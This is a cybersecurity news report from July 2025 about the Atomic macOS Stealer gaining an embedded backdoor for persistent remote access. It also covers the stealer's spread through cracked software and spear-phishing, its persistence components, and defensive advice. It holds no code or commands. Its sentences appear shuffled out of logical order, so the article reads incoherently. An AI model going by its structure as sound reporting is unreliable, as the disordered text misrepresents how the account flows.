According to cybersecurity researchers at Moonlock, MacPaw’s security division, this marks only the second known case of backdoor deployment targeting macOS users at a global scale, following similar tactics employed by North Korean threat actors. The cybersecurity community continues to monitor AMOS operations, with researchers sharing threat intelligence to help security teams update their defensive measures against this evolving menace to macOS users worldwide. However, while North Korean groups typically focus on quick cryptocurrency theft, the AMOS backdoor is designed for long-term persistence and extended system compromise. For the first time, this Russia-affiliated stealer is being deployed with an embedded backdoor, allowing attackers to maintain persistent access to compromised systems, execute remote commands, and establish long-term control over victim machines. This represents the most significant evolution of AMOS since its emergence, transforming what was once a “smash-and-grab” data theft tool into a platform for sustained surveillance and system compromise. The AMOS threat group appears to be following established patterns pioneered by North Korean cybercriminals, who have successfully combined backdoors with stealers in macOS attacks. The evolution of AMOS from a simple data stealer to a persistent backdoor significantly increases the risk to victims, transforming one-time breaches into long-term compromises. Security experts recommend that Mac users employ additional anti-malware software, remain vigilant against social engineering tactics, and reduce their digital footprint to minimize exposure to targeted attacks. The upgraded AMOS employs two primary distribution methods: websites offering cracked or counterfeit software, and sophisticated spear-phishing campaigns targeting high-value individuals, particularly cryptocurrency holders. Security researchers have observed a rapid increase in unique AMOS binary samples since the beginning of 2024, indicating active development and deployment. The malware-as-a-service (MaaS) industry’s growth suggests that more variants of the updated Atomic macOS Stealer will likely emerge, with enhanced capabilities for detection evasion and system penetration. The notorious Atomic macOS Stealer (AMOS) malware has received a dangerous upgrade that significantly escalates the threat to Mac users worldwide. Once executed, the malware establishes persistence through a complex chain of components, including a trojanized DMG file, bash wrapper scripts, and Terminal aliases designed to bypass macOS Gatekeeper protections.
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 08 Jul 2025 10:05:12 +0000